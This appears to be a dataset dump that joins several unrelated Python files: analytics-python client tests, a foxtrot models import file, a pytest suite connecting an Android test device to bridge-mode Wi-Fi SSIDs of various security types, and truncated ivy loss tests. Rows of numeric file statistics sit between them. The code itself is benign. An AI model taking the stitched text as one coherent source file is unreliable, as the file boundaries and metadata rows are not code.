        self.assertTrue(isinstance(msg['messageId'], str))
        self.assertEqual(msg['userId'], 'userId')
        self.assertEqual(msg['type'], 'identify')

    def test_advanced_identify(self):
        client = self.client
        success, msg = client.identify(
            'userId', { 'trait': 'value' }, { 'ip': '192.168.0.1' },
            datetime(2014, 9, 3), 'anonymousId', { 'Amplitude': True })
        self.assertTrue(success)
        self.assertEqual(msg['timestamp'], '2014-09-03T00:00:00+00:00')
        self.assertEqual(msg['integrations'], { 'Amplitude': True })
        self.assertEqual(msg['context']['ip'], '192.168.0.1')
        self.assertEqual(msg['traits'], { 'trait': 'value' })
        self.assertEqual(msg['anonymousId'], 'anonymousId')
        self.assertEqual(msg['context']['library'], {
            'name': 'analytics-python',
            'version': VERSION
        })
        self.assertTrue(isinstance(msg['timestamp'], str))
        self.assertTrue(isinstance(msg['messageId'], str))
        self.assertEqual(msg['userId'], 'userId')
        self.assertEqual(msg['type'], 'identify')

    def test_basic_group(self):
        client = self.client
        success, msg = client.group('userId', 'groupId')
        client.flush()
        self.assertTrue(success)
        self.assertFalse(self.failed)
        self.assertEqual(msg['groupId'], 'groupId')
        self.assertEqual(msg['userId'], 'userId')
        self.assertEqual(msg['type'], 'group')

    def test_advanced_group(self):
        client = self.client
        success, msg = client.group(
            'userId', 'groupId', { 'trait': 'value' }, { 'ip': '192.168.0.1' },
            datetime(2014, 9, 3), 'anonymousId', { 'Amplitude': True })
        self.assertTrue(success)
        self.assertEqual(msg['timestamp'], '2014-09-03T00:00:00+00:00')
        self.assertEqual(msg['integrations'], { 'Amplitude': True })
        self.assertEqual(msg['context']['ip'], '192.168.0.1')
        self.assertEqual(msg['traits'], { 'trait': 'value' })
        self.assertEqual(msg['anonymousId'], 'anonymousId')
        self.assertEqual(msg['context']['library'], {
            'name': 'analytics-python',
            'version': VERSION
        })
        self.assertTrue(isinstance(msg['timestamp'], str))
        self.assertTrue(isinstance(msg['messageId'], str))
        self.assertEqual(msg['userId'], 'userId')
        self.assertEqual(msg['type'], 'group')

    def test_basic_alias(self):
        client = self.client
        success, msg = client.alias('previousId', 'userId')
        client.flush()
        self.assertTrue(success)
        self.assertFalse(self.failed)
        self.assertEqual(msg['previousId'], 'previousId')
        self.assertEqual(msg['userId'], 'userId')

    def test_basic_page(self):
        client = self.client
        success, msg = client.page('userId', name='name')
        self.assertFalse(self.failed)
        client.flush()
        self.assertTrue(success)
        self.assertEqual(msg['userId'], 'userId')
        self.assertEqual(msg['type'], 'page')
        self.assertEqual(msg['name'], 'name')

    def test_advanced_page(self):
        client = self.client
        success, msg = client.page(
            'userId', 'category', 'name', { 'property': 'value' },
            { 'ip': '192.168.0.1' }, datetime(2014, 9, 3), 'anonymousId',
            { 'Amplitude': True })
        self.assertTrue(success)
        self.assertEqual(msg['timestamp'], '2014-09-03T00:00:00+00:00')
        self.assertEqual(msg['integrations'], { 'Amplitude': True })
        self.assertEqual(msg['context']['ip'], '192.168.0.1')
        self.assertEqual(msg['properties'], { 'property': 'value' })
        self.assertEqual(msg['anonymousId'], 'anonymousId')
        self.assertEqual(msg['context']['library'], {
            'name': 'analytics-python',
            'version': VERSION
        })
        self.assertEqual(msg['category'], 'category')
        self.assertTrue(isinstance(msg['timestamp'], str))
        self.assertTrue(isinstance(msg['messageId'], str))
        self.assertEqual(msg['userId'], 'userId')
        self.assertEqual(msg['type'], 'page')
        self.assertEqual(msg['name'], 'name')

    def test_basic_screen(self):
        client = self.client
        success, msg = client.screen('userId', name='name')
        client.flush()
        self.assertTrue(success)
        self.assertEqual(msg['userId'], 'userId')
        self.assertEqual(msg['type'], 'screen')
        self.assertEqual(msg['name'], 'name')

    def test_advanced_screen(self):
        client = self.client
        success, msg = client.screen(
            'userId', 'category', 'name', { 'property': 'value' },
            { 'ip': '192.168.0.1' }, datetime(2014, 9, 3), 'anonymousId',
            { 'Amplitude': True })
        self.assertTrue(success)
        self.assertEqual(msg['timestamp'], '2014-09-03T00:00:00+00:00')
        self.assertEqual(msg['integrations'], { 'Amplitude': True })
        self.assertEqual(msg['context']['ip'], '192.168.0.1')
        self.assertEqual(msg['properties'], { 'property': 'value' })
        self.assertEqual(msg['anonymousId'], 'anonymousId')
        self.assertEqual(msg['context']['library'], {
            'name': 'analytics-python',
            'version': VERSION
        })
        self.assertTrue(isinstance(msg['timestamp'], str))
        self.assertTrue(isinstance(msg['messageId'], str))
        self.assertEqual(msg['category'], 'category')
        self.assertEqual(msg['userId'], 'userId')
        self.assertEqual(msg['type'], 'screen')
        self.assertEqual(msg['name'], 'name')

    def test_flush(self):
        client = self.client
        # set up the consumer with more requests than a single batch will allow
        for i in range(1000):
            success, msg = client.identify('userId', { 'trait': 'value' })
        # We can't reliably assert that the queue is non-empty here; that's
        # a race condition. We do our best to load it up though.
        client.flush()
        # Make sure that the client queue is empty after flushing
        self.assertTrue(client.queue.empty())

    def test_overflow(self):
        client = Client('testsecret', max_queue_size=1)
        # Ensure consumer thread is no longer uploading
        client.join()
        for i in range(10):
            client.identify('userId')
        success, msg = client.identify('userId')
        # Make sure we are informed that the queue is at capacity
        self.assertFalse(success)

    def test_success_on_invalid_write_key(self):
        client = Client('bad_key', on_error=self.record_error)
        client.track('userId', 'event')
        client.flush()
        # A bad key should not surface as an error to the on_error hook.
        self.assertFalse(self.failed)

    def test_unicode(self):
        Client(six.u('unicode_key'))

    def test_numeric_user_id(self):
        self.client.track(1234, 'python event')
        self.client.flush()
        self.assertFalse(self.failed)

    def test_debug(self):
        Client('bad_key', debug=True)
| 38.181452
| 79
| 0.597212
| 1,032
| 9,469
| 5.435078
| 0.141473
| 0.168479
| 0.202175
| 0.062578
| 0.778927
| 0.76823
| 0.760029
| 0.735425
| 0.710109
| 0.706008
| 0
| 0.029338
| 0.240469
| 9,469
| 247
| 80
| 38.336032
| 0.750556
| 0.039497
| 0
| 0.696517
| 0
| 0
| 0.19705
| 0.01376
| 0
| 0
| 0
| 0
| 0.482587
| 1
| 0.104478
| false
| 0
| 0.029851
| 0
| 0.139303
| 0
| 0
| 0
| 0
| null | 0
| 1
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
6f4b982d14b19efac629e08a1e2f8f2d63570f48
| 145
|
py
|
Python
|
foxtrot/models/__init__.py
|
narfman0/foxtrot
|
ffcf9c4c0e01cda5ca65c4a3dd978a18cf762860
|
[
"MIT"
] | null | null | null |
foxtrot/models/__init__.py
|
narfman0/foxtrot
|
ffcf9c4c0e01cda5ca65c4a3dd978a18cf762860
|
[
"MIT"
] | 14
|
2018-08-16T20:37:13.000Z
|
2018-09-13T17:07:40.000Z
|
foxtrot/models/__init__.py
|
narfman0/foxtrot
|
ffcf9c4c0e01cda5ca65c4a3dd978a18cf762860
|
[
"MIT"
] | null | null | null |
from foxtrot.models.chunk import Chunk, Colony, Planet, RoomType, Ship
from foxtrot.models.npc import NPC
from foxtrot.models.world import World
| 36.25
| 70
| 0.82069
| 22
| 145
| 5.409091
| 0.5
| 0.277311
| 0.428571
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.110345
| 145
| 3
| 71
| 48.333333
| 0.922481
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
48a31c9dbaf340fb0bbb6c6c2f5fb5e04bf81953
| 24,647
|
py
|
Python
|
tests/e2e/interOp/validation_of_operating_modes/bridge_mode/client_connect_test/android/test_general_security_modes.py
|
dutta-rohan/wlan-testing
|
77264245b62e21dff5f38c7eae74c22e0cdeefbb
|
[
"BSD-3-Clause"
] | 7
|
2020-08-19T16:45:46.000Z
|
2022-02-10T09:55:22.000Z
|
tests/e2e/interOp/validation_of_operating_modes/bridge_mode/client_connect_test/android/test_general_security_modes.py
|
dutta-rohan/wlan-testing
|
77264245b62e21dff5f38c7eae74c22e0cdeefbb
|
[
"BSD-3-Clause"
] | 47
|
2020-12-20T16:06:03.000Z
|
2022-03-23T03:01:22.000Z
|
tests/e2e/interOp/validation_of_operating_modes/bridge_mode/client_connect_test/android/test_general_security_modes.py
|
dutta-rohan/wlan-testing
|
77264245b62e21dff5f38c7eae74c22e0cdeefbb
|
[
"BSD-3-Clause"
] | 9
|
2021-02-04T22:32:06.000Z
|
2021-12-14T17:45:51.000Z
|
from logging import exception
import unittest
import warnings
from perfecto.test import TestResultFactory
import pytest
import sys
import time
from selenium.common.exceptions import NoSuchElementException
from selenium.webdriver.common.by import By
from appium import webdriver
from selenium.common.exceptions import NoSuchElementException
import random
import string
import sys
import allure
if 'perfecto_libs' not in sys.path:
sys.path.append(f'../libs/perfecto_libs')
pytestmark = [pytest.mark.sanity, pytest.mark.interop, pytest.mark.android, pytest.mark.interop_and, pytest.mark.client_connect
,pytest.mark.interop_uc_sanity, pytest.mark.bridge]
from android_lib import closeApp, set_APconnMobileDevice_android, Toggle_AirplaneMode_android, ForgetWifiConnection, openApp, get_ip_address_and
# AP profile for Suite-A: WPA, open, and WPA2-personal SSIDs on both the
# 2.4 GHz ("2G") and 5 GHz ("5G") radios, bridge mode, no RADIUS.
setup_params_general = {
    "mode": "BRIDGE",
    "ssid_modes": {
        "wpa": [{"ssid_name": "ssid_wpa_2g", "appliedRadios": ["2G"], "security_key": "something"},
                {"ssid_name": "ssid_wpa_5g", "appliedRadios": ["5G"],
                 "security_key": "something"}],
        "open": [{"ssid_name": "ssid_open_2g", "appliedRadios": ["2G"]},
                 {"ssid_name": "ssid_open_5g", "appliedRadios": ["5G"]}],
        "wpa2_personal": [
            {"ssid_name": "ssid_wpa2_2g", "appliedRadios": ["2G"], "security_key": "something"},
            {"ssid_name": "ssid_wpa2_5g", "appliedRadios": ["5G"],
             "security_key": "something"}]},
    "rf": {},
    "radius": False
}
# Append a per-run suffix to every SSID name: 3 random uppercase/digit
# characters plus time_ns() mod 10000 -- presumably to keep SSIDs unique
# across concurrent/repeated runs (TODO confirm against test-bed setup).
for sec_modes in setup_params_general['ssid_modes'].keys():
    for i in range(len(setup_params_general['ssid_modes'][sec_modes])):
        N = 3
        rand_string = (''.join(random.choices(string.ascii_uppercase +
                                              string.digits, k=N)))+str(int(time.time_ns())%10000)
        setup_params_general['ssid_modes'][sec_modes][i]['ssid_name'] = setup_params_general['ssid_modes'][sec_modes][i]['ssid_name'] + "_"+ rand_string
@allure.suite(suite_name="interop sanity")
@allure.sub_suite(sub_suite_name="Bridge Mode Client Connect : Suite-A")
@pytest.mark.InteropsuiteA
@allure.feature("BRIDGE MODE CLIENT CONNECT")
@pytest.mark.parametrize(
    'setup_profiles',
    [setup_params_general],
    indirect=True,
    scope="class"
)
@pytest.mark.usefixtures("setup_profiles")
class TestBridgeModeConnectSuiteOne(object):
    """ Client Connect SuiteA
        pytest -m "client_connect and bridge and InteropsuiteA"
    """

    # Refactor: the six test methods below previously contained six
    # copy-pasted versions of the same connect-and-verify flow; the shared
    # logic now lives in _client_connect and each test only selects its
    # SSID profile. Signatures and markers are unchanged.

    def _client_connect(self, request, get_vif_state, get_ToggleAirplaneMode_data,
                        setup_perfectoMobile_android, profile_data, open_mode=False):
        """Connect the Android device to the SSID in *profile_data* and
        assert the connection result.

        open_mode -- True for open SSIDs (no security key); the password
        placeholder "[BLANK]" is passed through instead.
        """
        ssidName = profile_data["ssid_name"]
        ssidPassword = "[BLANK]" if open_mode else profile_data["security_key"]
        print ("SSID_NAME: " + ssidName)
        print ("SSID_PASS: " + ssidPassword)
        get_vif_state.append(ssidName)
        # NOTE(review): because ssidName was just appended, this membership
        # test can never be false and the xfail below is dead code in the
        # original as well; preserved as-is pending clarification of the
        # get_vif_state fixture's intent.
        if ssidName not in get_vif_state:
            allure.attach(name="retest,vif state ssid not available:", body=str(get_vif_state))
            pytest.xfail("SSID NOT AVAILABLE IN VIF STATE")
        connData = get_ToggleAirplaneMode_data
        # Set Wifi/AP Mode
        ip, is_internet = get_ip_address_and(request, ssidName, ssidPassword,
                                             setup_perfectoMobile_android, connData)
        if ip:
            if is_internet:
                text_body = ("connected to " + ssidName + " (" + ip + ") " + "with internet")
            else:
                text_body = ("connected to " + ssidName + " (" + ip + ") " + "without internet")
            print(text_body)
            allure.attach(name="Connection Status: ", body=str(text_body))
            assert True
        else:
            allure.attach(name="Connection Status: ", body=str("Device is Unable to connect"))
            assert False

    @allure.testcase(url="https://telecominfraproject.atlassian.net/browse/WIFI-4570", name="WIFI-4570")
    @pytest.mark.fiveg
    @pytest.mark.wpa2_personal
    def test_ClientConnect_5g_WPA2_Personal_Bridge(self, request, get_vif_state, get_ap_logs,
                                                   get_ToggleAirplaneMode_data, setup_perfectoMobile_android):
        profile_data = setup_params_general["ssid_modes"]["wpa2_personal"][1]
        self._client_connect(request, get_vif_state, get_ToggleAirplaneMode_data,
                             setup_perfectoMobile_android, profile_data)

    @allure.testcase(url="https://telecominfraproject.atlassian.net/browse/WIFI-4569", name="WIFI-4569")
    @pytest.mark.twog
    @pytest.mark.wpa2_personal
    def test_ClientConnect_2g_WPA2_Personal_Bridge(self, request, get_vif_state, get_ap_logs,
                                                   get_ToggleAirplaneMode_data, setup_perfectoMobile_android):
        profile_data = setup_params_general["ssid_modes"]["wpa2_personal"][0]
        self._client_connect(request, get_vif_state, get_ToggleAirplaneMode_data,
                             setup_perfectoMobile_android, profile_data)

    @allure.testcase(url="https://telecominfraproject.atlassian.net/browse/WIFI-4568", name="WIFI-4568")
    @pytest.mark.fiveg
    @pytest.mark.wpa
    def test_ClientConnect_5g_WPA_Personal_Bridge(self, request, get_vif_state, get_ap_logs,
                                                  get_ToggleAirplaneMode_data, setup_perfectoMobile_android):
        profile_data = setup_params_general["ssid_modes"]["wpa"][1]
        self._client_connect(request, get_vif_state, get_ToggleAirplaneMode_data,
                             setup_perfectoMobile_android, profile_data)

    @allure.testcase(url="https://telecominfraproject.atlassian.net/browse/WIFI-4567", name="WIFI-4567")
    @pytest.mark.twog
    @pytest.mark.wpa
    def test_ClientConnect_2g_WPA_Personal_Bridge(self, request, get_vif_state, get_ap_logs,
                                                  get_ToggleAirplaneMode_data, setup_perfectoMobile_android):
        profile_data = setup_params_general["ssid_modes"]["wpa"][0]
        self._client_connect(request, get_vif_state, get_ToggleAirplaneMode_data,
                             setup_perfectoMobile_android, profile_data)

    @allure.testcase(url="https://telecominfraproject.atlassian.net/browse/WIFI-4566", name="WIFI-4566")
    @pytest.mark.fiveg
    @pytest.mark.open
    def test_ClientConnect_5g_Open_Bridge(self, request, get_vif_state, get_ap_logs,
                                          get_ToggleAirplaneMode_data, setup_perfectoMobile_android):
        profile_data = setup_params_general["ssid_modes"]["open"][1]
        self._client_connect(request, get_vif_state, get_ToggleAirplaneMode_data,
                             setup_perfectoMobile_android, profile_data, open_mode=True)

    @allure.testcase(url="https://telecominfraproject.atlassian.net/browse/WIFI-4565", name="WIFI-4565")
    @pytest.mark.twog
    @pytest.mark.open
    def test_ClientConnect_2g_Open_Bridge(self, request, get_vif_state, get_ap_logs,
                                          get_ToggleAirplaneMode_data, setup_perfectoMobile_android):
        profile_data = setup_params_general["ssid_modes"]["open"][0]
        self._client_connect(request, get_vif_state, get_ToggleAirplaneMode_data,
                             setup_perfectoMobile_android, profile_data, open_mode=True)
# AP profile for Suite-B: WPA3-personal, WPA3-personal-mixed and
# WPA/WPA2-personal-mixed SSIDs on both radios, bridge mode, no RADIUS.
setup_params_general_two = {
    "mode": "BRIDGE",
    "ssid_modes": {
        "wpa3_personal": [
            {"ssid_name": "ssid_wpa3_p_2g", "appliedRadios": ["2G"], "security_key": "something"},
            {"ssid_name": "ssid_wpa3_p_5g", "appliedRadios": ["5G"],
             "security_key": "something"}],
        "wpa3_personal_mixed": [
            {"ssid_name": "ssid_wpa3_p_m_2g", "appliedRadios": ["2G"], "security_key": "something"},
            {"ssid_name": "ssid_wpa3_p_m_5g", "appliedRadios": ["5G"],
             "security_key": "something"}],
        "wpa_wpa2_personal_mixed": [
            {"ssid_name": "ssid_wpa_wpa2_p_m_2g", "appliedRadios": ["2G"], "security_key": "something"},
            {"ssid_name": "ssid_wpa_wpa2_p_m_5g", "appliedRadios": ["5G"],
             "security_key": "something"}]
    },
    "rf": {},
    "radius": False
}
# Per-run SSID suffixing as in Suite-A, but with only 2 random characters
# and with the "ssid_" prefix stripped first -- presumably to keep the
# longer Suite-B names within an SSID length limit (TODO confirm).
for sec_modes in setup_params_general_two['ssid_modes'].keys():
    for i in range(len(setup_params_general_two['ssid_modes'][sec_modes])):
        N = 2
        rand_string = (''.join(random.choices(string.ascii_uppercase +
                                              string.digits, k=N)))+str(int(time.time_ns())%10000)
        setup_params_general_two['ssid_modes'][sec_modes][i]['ssid_name'] = setup_params_general_two['ssid_modes'][sec_modes][i]['ssid_name'].replace("ssid_","") + "_"+ rand_string
@allure.suite(suite_name="interop sanity")
@allure.sub_suite(sub_suite_name="Bridge Mode Client Connect : Suite-B")
@pytest.mark.InteropsuiteB
@allure.feature("BRIDGE MODE CLIENT CONNECT")
@pytest.mark.parametrize(
'setup_profiles',
[setup_params_general_two],
indirect=True,
scope="class"
)
@pytest.mark.usefixtures("setup_profiles")
class TestBridgeModeConnectSuiteTwo(object):
""" Client Connect SuiteA
pytest -m "client_connect and bridge and InteropsuiteB"
"""
@allure.testcase(url="https://telecominfraproject.atlassian.net/browse/WIFI-4572", name="WIFI-4572")
@pytest.mark.fiveg
@pytest.mark.wpa3_personal
def test_ClientConnect_5g_wpa3_personal_Bridge(self, request, get_vif_state, get_ap_logs,
get_ToggleAirplaneMode_data, setup_perfectoMobile_android):
profile_data = setup_params_general_two["ssid_modes"]["wpa3_personal"][1]
ssidName = profile_data["ssid_name"]
ssidPassword = profile_data["security_key"]
print ("SSID_NAME: " + ssidName)
print ("SSID_PASS: " + ssidPassword)
get_vif_state.append(ssidName)
if ssidName not in get_vif_state:
allure.attach(name="retest,vif state ssid not available:", body=str(get_vif_state))
pytest.xfail("SSID NOT AVAILABLE IN VIF STATE")
report = setup_perfectoMobile_android[1]
driver = setup_perfectoMobile_android[0]
connData = get_ToggleAirplaneMode_data
# Set Wifi/AP Mode
ip, is_internet = get_ip_address_and(request, ssidName, ssidPassword, setup_perfectoMobile_android, connData)
if ip:
if is_internet:
text_body = ("connected to " + ssidName + " (" + ip + ") " + "with internet")
else:
text_body = ("connected to " + ssidName + " (" + ip + ") " + "without internet")
print(text_body)
allure.attach(name="Connection Status: ", body=str(text_body))
assert True
else:
allure.attach(name="Connection Status: ", body=str("Device is Unable to connect"))
assert False
@allure.testcase(url="https://telecominfraproject.atlassian.net/browse/WIFI-4571", name="WIFI-4571")
@pytest.mark.twog
@pytest.mark.wpa3_personal
def test_ClientConnect_2g_wpa3_personal_Bridge(self, request, get_vif_state, get_ap_logs,
get_ToggleAirplaneMode_data, setup_perfectoMobile_android):
profile_data = setup_params_general_two["ssid_modes"]["wpa3_personal"][0]
ssidName = profile_data["ssid_name"]
ssidPassword = profile_data["security_key"]
print ("SSID_NAME: " + ssidName)
print ("SSID_PASS: " + ssidPassword)
get_vif_state.append(ssidName)
if ssidName not in get_vif_state:
allure.attach(name="retest,vif state ssid not available:", body=str(get_vif_state))
pytest.xfail("SSID NOT AVAILABLE IN VIF STATE")
report = setup_perfectoMobile_android[1]
driver = setup_perfectoMobile_android[0]
connData = get_ToggleAirplaneMode_data
# Set Wifi/AP Mode
ip, is_internet = get_ip_address_and(request, ssidName, ssidPassword, setup_perfectoMobile_android, connData)
if ip:
if is_internet:
text_body = ("connected to " + ssidName + " (" + ip + ") " + "with internet")
else:
text_body = ("connected to " + ssidName + " (" + ip + ") " + "without internet")
print(text_body)
allure.attach(name="Connection Status: ", body=str(text_body))
assert True
else:
allure.attach(name="Connection Status: ", body=str("Device is Unable to connect"))
assert False
@allure.testcase(url="https://telecominfraproject.atlassian.net/browse/WIFI-4574", name="WIFI-4574")
@pytest.mark.fiveg
@pytest.mark.wpa3_personal_mixed
def test_ClientConnect_5g_wpa3_personal_mixed_Bridge(self, request, get_vif_state, get_ap_logs,
get_ToggleAirplaneMode_data, setup_perfectoMobile_android):
profile_data = setup_params_general_two["ssid_modes"]["wpa3_personal_mixed"][1]
ssidName = profile_data["ssid_name"]
ssidPassword = profile_data["security_key"]
print ("SSID_NAME: " + ssidName)
print ("SSID_PASS: " + ssidPassword)
get_vif_state.append(ssidName)
if ssidName not in get_vif_state:
allure.attach(name="retest,vif state ssid not available:", body=str(get_vif_state))
pytest.xfail("SSID NOT AVAILABLE IN VIF STATE")
report = setup_perfectoMobile_android[1]
driver = setup_perfectoMobile_android[0]
connData = get_ToggleAirplaneMode_data
# Set Wifi/AP Mode
ip, is_internet = get_ip_address_and(request, ssidName, ssidPassword, setup_perfectoMobile_android, connData)
if ip:
if is_internet:
text_body = ("connected to " + ssidName + " (" + ip + ") " + "with internet")
else:
text_body = ("connected to " + ssidName + " (" + ip + ") " + "without internet")
print(text_body)
allure.attach(name="Connection Status: ", body=str(text_body))
assert True
else:
allure.attach(name="Connection Status: ", body=str("Device is Unable to connect"))
assert False
@allure.testcase(url="https://telecominfraproject.atlassian.net/browse/WIFI-4573", name="WIFI-4573")
@pytest.mark.twog
@pytest.mark.wpa3_personal_mixed
def test_ClientConnect_2g_wpa3_personal_mixed_Bridge(self, request, get_vif_state, get_ap_logs,
                                                     get_ToggleAirplaneMode_data, setup_perfectoMobile_android):
    """Connect a Perfecto Android client to the 2.4 GHz wpa3_personal_mixed bridge SSID."""
    profile = setup_params_general_two["ssid_modes"]["wpa3_personal_mixed"][0]
    ssidName = profile["ssid_name"]
    ssidPassword = profile["security_key"]
    print("SSID_NAME: " + ssidName)
    print("SSID_PASS: " + ssidPassword)
    # NOTE(review): appending the SSID before the membership test makes the
    # xfail branch unreachable — confirm whether this bypass is intentional.
    get_vif_state.append(ssidName)
    if ssidName not in get_vif_state:
        allure.attach(name="retest,vif state ssid not available:", body=str(get_vif_state))
        pytest.xfail("SSID NOT AVAILABLE IN VIF STATE")
    report = setup_perfectoMobile_android[1]
    driver = setup_perfectoMobile_android[0]
    connData = get_ToggleAirplaneMode_data
    # Attempt the Wi-Fi association and attach the outcome to the report.
    ip, is_internet = get_ip_address_and(request, ssidName, ssidPassword, setup_perfectoMobile_android, connData)
    if not ip:
        allure.attach(name="Connection Status: ", body=str("Device is Unable to connect"))
        assert False
    else:
        suffix = "with internet" if is_internet else "without internet"
        text_body = "connected to " + ssidName + " (" + ip + ") " + suffix
        print(text_body)
        allure.attach(name="Connection Status: ", body=str(text_body))
        assert True
@allure.testcase(url="https://telecominfraproject.atlassian.net/browse/WIFI-4576", name="WIFI-4576")
@pytest.mark.fiveg
@pytest.mark.wpa_wpa2_personal_mixed
def test_ClientConnect_5g_wpa_wpa2_personal_mixed_Bridge(self, request, get_vif_state, get_ap_logs,
                                                         get_ToggleAirplaneMode_data, setup_perfectoMobile_android):
    """Connect a Perfecto Android client to the 5 GHz wpa_wpa2_personal_mixed bridge SSID."""
    profile = setup_params_general_two["ssid_modes"]["wpa_wpa2_personal_mixed"][1]
    ssidName = profile["ssid_name"]
    ssidPassword = profile["security_key"]
    print("SSID_NAME: " + ssidName)
    print("SSID_PASS: " + ssidPassword)
    # NOTE(review): appending the SSID before the membership test makes the
    # xfail branch unreachable — confirm whether this bypass is intentional.
    get_vif_state.append(ssidName)
    if ssidName not in get_vif_state:
        allure.attach(name="retest,vif state ssid not available:", body=str(get_vif_state))
        pytest.xfail("SSID NOT AVAILABLE IN VIF STATE")
    report = setup_perfectoMobile_android[1]
    driver = setup_perfectoMobile_android[0]
    connData = get_ToggleAirplaneMode_data
    # Attempt the Wi-Fi association and attach the outcome to the report.
    ip, is_internet = get_ip_address_and(request, ssidName, ssidPassword, setup_perfectoMobile_android, connData)
    if not ip:
        allure.attach(name="Connection Status: ", body=str("Device is Unable to connect"))
        assert False
    else:
        suffix = "with internet" if is_internet else "without internet"
        text_body = "connected to " + ssidName + " (" + ip + ") " + suffix
        print(text_body)
        allure.attach(name="Connection Status: ", body=str(text_body))
        assert True
@allure.testcase(url="https://telecominfraproject.atlassian.net/browse/WIFI-4575", name="WIFI-4575")
@pytest.mark.twog
@pytest.mark.wpa_wpa2_personal_mixed
def test_ClientConnect_2g_wpa_wpa2_personal_mixed_Bridge(self, request, get_vif_state, get_ap_logs,
                                                         get_ToggleAirplaneMode_data, setup_perfectoMobile_android):
    """Connect a Perfecto Android client to the 2.4 GHz wpa_wpa2_personal_mixed bridge SSID."""
    profile = setup_params_general_two["ssid_modes"]["wpa_wpa2_personal_mixed"][0]
    ssidName = profile["ssid_name"]
    ssidPassword = profile["security_key"]
    print("SSID_NAME: " + ssidName)
    print("SSID_PASS: " + ssidPassword)
    # NOTE(review): appending the SSID before the membership test makes the
    # xfail branch unreachable — confirm whether this bypass is intentional.
    get_vif_state.append(ssidName)
    if ssidName not in get_vif_state:
        allure.attach(name="retest,vif state ssid not available:", body=str(get_vif_state))
        pytest.xfail("SSID NOT AVAILABLE IN VIF STATE")
    report = setup_perfectoMobile_android[1]
    driver = setup_perfectoMobile_android[0]
    connData = get_ToggleAirplaneMode_data
    # Attempt the Wi-Fi association and attach the outcome to the report.
    ip, is_internet = get_ip_address_and(request, ssidName, ssidPassword, setup_perfectoMobile_android, connData)
    if not ip:
        allure.attach(name="Connection Status: ", body=str("Device is Unable to connect"))
        assert False
    else:
        suffix = "with internet" if is_internet else "without internet"
        text_body = "connected to " + ssidName + " (" + ip + ") " + suffix
        print(text_body)
        allure.attach(name="Connection Status: ", body=str(text_body))
        assert True
| 45.223853
| 180
| 0.634073
| 2,777
| 24,647
| 5.3583
| 0.063738
| 0.03871
| 0.087366
| 0.030645
| 0.913508
| 0.906048
| 0.878562
| 0.860551
| 0.850202
| 0.827487
| 0
| 0.011773
| 0.255609
| 24,647
| 544
| 181
| 45.306985
| 0.799259
| 0.022356
| 0
| 0.787671
| 0
| 0
| 0.211879
| 0.003743
| 0
| 0
| 0
| 0
| 0.054795
| 1
| 0.027397
| false
| 0.082192
| 0.03653
| 0
| 0.068493
| 0.082192
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 8
|
5b09211906cd736bbcdc9d38138282a392f4e975
| 3,220
|
py
|
Python
|
ivy_tests/test_ivy/test_functional/test_nn/test_losses.py
|
VedPatwardhan/ivy
|
7b2105fa8cf38879444a1029bfaa7f0b2f27717a
|
[
"Apache-2.0"
] | 1
|
2022-02-13T19:35:02.000Z
|
2022-02-13T19:35:02.000Z
|
ivy_tests/test_ivy/test_functional/test_nn/test_losses.py
|
Arijit1000/ivy
|
de193946a580ca0f54d78fe7fc4031a6ff66d2bb
|
[
"Apache-2.0"
] | null | null | null |
ivy_tests/test_ivy/test_functional/test_nn/test_losses.py
|
Arijit1000/ivy
|
de193946a580ca0f54d78fe7fc4031a6ff66d2bb
|
[
"Apache-2.0"
] | null | null | null |
# global
import numpy as np
from hypothesis import given, strategies as st
# local
import ivy
import ivy_tests.test_ivy.helpers as helpers
# cross_entropy
@given(
    dtype_and_x=helpers.dtype_and_values(ivy.valid_float_dtypes, 2),
    as_variable=helpers.list_of_length(st.booleans(), 2),
    num_positional_args=helpers.num_positional_args(fn_name="cross_entropy"),
    native_array=helpers.list_of_length(st.booleans(), 2),
    container=helpers.list_of_length(st.booleans(), 2),
    instance_method=st.booleans(),
)
def test_cross_entropy(
    dtype_and_x,
    as_variable,
    num_positional_args,
    native_array,
    container,
    instance_method,
    fw,
):
    """Property-test ivy.cross_entropy on backend *fw*.

    Hypothesis supplies the (dtypes, values) pair; helpers.test_array_function
    exercises the function/instance/container/native-array call matrix.
    """
    input_dtype, x = dtype_and_x
    # BUG FIX: the original guard `if (v == [] for v in x):` evaluated a
    # generator object, which is always truthy, so every example returned
    # early and the op was never tested. `any(...)` is the intended check.
    if any(v == [] for v in x):
        return
    # BUG FIX: input_dtype is a sequence of dtype strings (it is indexed as
    # input_dtype[0]/[1] below), so `input_dtype == "float16"` was never true
    # and the torch-float16 skip never fired; membership is the intended test.
    if fw == "torch" and "float16" in input_dtype:
        return
    helpers.test_array_function(
        input_dtype,
        as_variable,
        False,
        num_positional_args,
        native_array,
        container,
        instance_method,
        fw,
        "cross_entropy",
        true=np.asarray(x[0], dtype=input_dtype[0]),
        pred=np.asarray(x[1], dtype=input_dtype[1]),
    )
# binary_cross_entropy
@given(
    dtype_and_x=helpers.dtype_and_values(ivy.valid_float_dtypes, 2),
    as_variable=helpers.list_of_length(st.booleans(), 2),
    num_positional_args=helpers.num_positional_args(fn_name="binary_cross_entropy"),
    native_array=helpers.list_of_length(st.booleans(), 2),
    container=helpers.list_of_length(st.booleans(), 2),
    instance_method=st.booleans(),
)
def test_binary_cross_entropy(
    dtype_and_x,
    as_variable,
    num_positional_args,
    native_array,
    container,
    instance_method,
    fw,
):
    """Property-test ivy.binary_cross_entropy on backend *fw*.

    Hypothesis supplies the (dtypes, values) pair; helpers.test_array_function
